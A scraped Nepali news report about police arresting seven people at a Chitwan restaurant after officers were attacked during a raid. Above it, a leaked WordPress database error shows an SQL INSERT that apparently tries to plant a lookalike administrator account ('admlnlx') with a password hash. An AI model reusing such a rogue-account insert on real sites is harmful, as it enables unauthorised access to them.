WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BUwiG7eOYJSCLJ7mBMs4r9w1clkd7/.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-16 10:05:50', '', 'admlnlx', 'admlnlx')
चितवन , माघ ३
पूर्वीचितवनको राप्ती ६ भण्डारा मा रहेको कोकोनट रेष्टुरेण्टबाट प्रहरीले ७ जनालाई पक्राउ गरेको छ । ईलाका प्रहरी कार्यालय भण्डाराबाट प्रहरी निरीक्षक रामेश्वर त्वाती को नेतृत्वमा खटिएको प्रहरी टोलीले २ जना महिला र ५ जना पुरुषलाई पक्राउ गरेको हो ।
रेष्टुरेण्टमा अश्लील क्रियाकलाप हुने गरेको सुचनाको आधारमा आइतबार राती छड्के चेकजाँचको लागी गएको प्रहरी टोलीमाथी आक्रमण भएको प्रहरीले जनाएको छ । प्रहरीलाई देख्नासाथ रेष्टुरेण्टमा रहेकाले प्रहरीमाथी आक्रमण गरेको र त्यसपश्चात् गएको थप प्रहरी टोलीले उनीहरुलाई पक्राउ गरेको ईलाका प्रहरी कार्यालय खैरहनीका प्रहरी निरिक्षक घजिन्द्र बहादुर कार्कीले जानकारी दिए । उनीहरुलाई आज नै म्याद थप गरी अनुसन्धान भईरहेको कार्कीले बताए ।